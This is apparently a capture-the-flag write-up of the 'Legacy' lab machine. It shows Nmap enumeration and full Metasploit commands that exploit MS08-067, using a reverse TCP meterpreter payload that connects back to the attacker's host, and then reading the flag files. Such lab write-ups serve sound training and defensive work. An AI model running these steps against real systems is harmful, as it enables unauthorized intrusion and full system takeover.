Another OSCP-like Box: Legacy
This is my fourth writeup for this series.
Enumeration
I started my enumeration with Nmap. I like to do a staged scan, so here I started with a very fast scan (-T5) on the top 1000 TCP ports.
sudo nmap -T5 -n -vvv -oA initial-scan 10.10.10.4
I found that TCP ports 139 and 445 are open. I then performed a targeted scans on those ports.
sudo nmap -sC -sV -O -p139,445 -oA targeted 10.10.10.4
- -sC invokes the default NSE script scans
- -sV performs a version scan
- -O is Operating System scan
- -p invokes the port
- -oA outputs the result in all formats
All Ports
I ran all TCP ports scan using the command below.
sudo nmap -p- -oA allports 10.10.10.4
Based on Figure 1.1, Nmap detected that the target is possibly a Windows XP SP3 machine. I then performed a basic vulnerability scan on this target using NSE scripts.
sudo nmap --script vuln -p139,445 -oA vuln-scan 10.10.10.4
Based on Figure 1.3, Nmap found that the target is possibly vulnerable to MS08-067 and MS17–010
I validated if the host is indeed vulnerable to MS08–067 using Metasploit. Based on the output in Figure 1.3, the host is indeed vulnerable.
search ms08–067
use 0
set rhosts 10.10.10.4
check
Exploitation
I then exploited the target using the same Metasploit module. Please note that is exploit will mostly crash the SMB service so we need to be accurate with the target information. Run “show targets” to check for all available targets.
It seemed that I had multiple targets to choose from. I then used the smb_version scanner in Metasploit to accurately see the Operating System details and a possible Service Pack info.
search smb_version type:auxiliary
use 0
set rhost 10.10.10.4
run
The scanner showed that the target is running Windows XP SP3 English. In the MS08–067 exploit module, the two possible targets are numbers 6 and 7.
I started with “Target 6”, used a “windows/meterpreter/reverse_tcp” as the payload, entered “lhost”(this is the IP of my Kali), and “lport”(this is any unused ports in Kali).
use exploit/windows/smb/ms08_067_netapi
set rhosts 10.10.10.4
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.4
set lport 5555
set target 6
exploit
I successfully had a shell access of the target with NT Authority\System permission.
Flags
shell
net users
type “C:\Documents and Settings\john\Desktop\user.txt”
type “C:\Documents and Settings\Administrator\Desktop\root.txt”
Key Takeaways
- Use staged scanning when performing initial enumeration
- Utilize the Nmap NSE script for basic vulnerability scan. If allowed, start with an automated vulnerability scanner first like Nessus then perform a manual validation.
- Be careful with certain exploits that will most likely crash a service
- MS08–067 and MS17–010 are old exploits. Apply necessary patch
- Dont use End of Life systems as much as possible, but if It cant be avoided apply necessary compensating security controls.
